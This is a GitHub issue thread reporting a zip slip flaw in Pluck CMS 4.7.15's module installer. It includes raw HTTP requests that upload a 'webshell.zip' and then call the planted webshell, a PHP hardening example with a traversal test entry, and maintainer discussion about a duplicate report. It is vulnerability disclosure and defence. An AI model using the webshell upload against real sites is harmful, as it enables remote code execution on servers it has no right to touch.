pluck-cms / pluck

Central repo for pluck cms

Home Page: http://www.pluck-cms.org


Pluck 4.7.15 - Zip Slip Vulnerability

debug601 opened this issue · comments

Issue Summary
Pluck's module and installmodule are vulnerable to directory traversal (via zip slip) and arbitrary code execution.
php version: php5.2.1
Detailed Description
There is a problem in Pluck 4.7.15. /data/inc/module_install.php allows remote malicious users to upload malicious zip files to traverse directories outside the expected environment, which may allow execution of arbitrary code that will run with the privileges of the user assigned to the Web server.

Vulnerability url:
http://192.168.1.128/pluck4.7.15/admin.php?action=installmodule

Vulnerability POC:

POST /pluck4.7.15/admin.php?action=installmodule HTTP/1.1
Host: 192.168.1.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.128/pluck4.7.15/admin.php?action=installmodule
Cookie: PHPSESSID=9f912ae90a81102465d8590f4f007e8e
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------26434200512599
Content-Length: 478

-----------------------------26434200512599
Content-Disposition: form-data; name="sendfile"; filename="webshell.zip"
Content-Type: application/x-zip-compressed

PK���
-----------------------------26434200512599
Content-Disposition: form-data; name="submit"

Upload
-----------------------------26434200512599--

Arbitrary code execution

GET /pluck4.7.15/data/modules/webshell/2.php HTTP/1.1
Host: 192.168.1.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=9f912ae90a81102465d8590f4f007e8e
Connection: close

Impact
This vulnerability allows remote code execution and directory traversal under the privileges of the user running the Web server application.
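A hardened replacement for the kind of unchecked extraction described above, as an added example that is not Pluck's code (the function names and the constructed demo archive are assumptions of this example): every entry name is validated before anything is written, and each resolved parent directory is re-checked against the destination.

```php
<?php
// Added example, not Pluck's own code: extracts a module archive only after every
// entry name has been validated, so a crafted "../" entry never escapes $dest.
function assertSafeEntryName(string $name): void {
    // Reject empty names, absolute paths, drive letters, backslashes and ".." segments.
    if ($name === '' || $name[0] === '/' || preg_match('#^[A-Za-z]:|\\\\#', $name)
        || in_array('..', explode('/', $name), true)) {
        throw new RuntimeException("zip slip entry rejected: $name");
    }
}
function extractModuleZip(string $zipPath, string $dest): array {
    $zip = new ZipArchive();
    if ($zip->open($zipPath) !== true) throw new RuntimeException("cannot open $zipPath");
    $destReal = realpath($dest);
    if ($destReal === false) throw new RuntimeException("destination missing: $dest");
    // Pass 1: validate all names before writing anything, so a bad archive leaves no files.
    $names = [];
    for ($i = 0; $i < $zip->numFiles; $i++) {
        $names[$i] = $zip->getNameIndex($i);
        assertSafeEntryName($names[$i]);
    }
    // Pass 2: write, re-checking each resolved parent against $destReal (catches a symlink
    // that already exists under the destination and points elsewhere).
    $written = [];
    foreach ($names as $i => $name) {
        $target = $destReal . '/' . $name;
        $isDir = substr($name, -1) === '/';
        $dir = $isDir ? $target : dirname($target);
        if (!is_dir($dir)) mkdir($dir, 0755, true);
        $dirReal = realpath($dir);
        if ($dirReal === false || strpos($dirReal . '/', $destReal . '/') !== 0) {
            throw new RuntimeException("entry resolves outside destination: $name");
        }
        if (!$isDir) {
            file_put_contents($target, $zip->getFromIndex($i));
            $written[] = $name;
        }
    }
    $zip->close();
    return $written;
}
// Constructed demo archive: one benign entry plus one traversal entry.
$tmpZip = tempnam(sys_get_temp_dir(), 'zs');
$dest = sys_get_temp_dir() . '/modules_' . getmypid();
mkdir($dest);
$z = new ZipArchive(); $z->open($tmpZip, ZipArchive::CREATE | ZipArchive::OVERWRITE);
$z->addFromString('mymodule/readme.txt', 'benign content');
$z->addFromString('../../escaped.php', '<?php echo "outside"; ?>');
$z->close();
try { extractModuleZip($tmpZip, $dest); } catch (RuntimeException $e) { echo $e->getMessage(), "\n"; }
```

Because validation happens in a first pass over all entries, the benign entry is not written either: a rejected archive leaves nothing behind in the modules directory.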

This is a duplicate of issue #100 which has been fixed in the latest dev version.

This is a new way to use it.

See if it still exists in the latest dev version. Issue #100 is fixed in the latest version, which should make zip slip impossible.


I also tested it on Pluck 4.7.16.dev1 and found this vulnerability.
This means that Pluck 4.7.15 has not fixed this utilization method at all. This is fundamentally different from #100. I believe this loophole exists in Pluck 4.7.15, Pluck 4.7.16.dev1-dev3 and all the versions you have released so far. I want to apply for a CVE for each version.

#100 is the use of the file "/admin.php?action=themeinstall", #105 while mine is "admin.php?action=installmodule". These are two different ways of using it.

See if it still exists in the latest dev version. Issue #100 is fixed in the latest version, which should make zip slip impossible.

You shouldn't say that my use is repeated. It is real.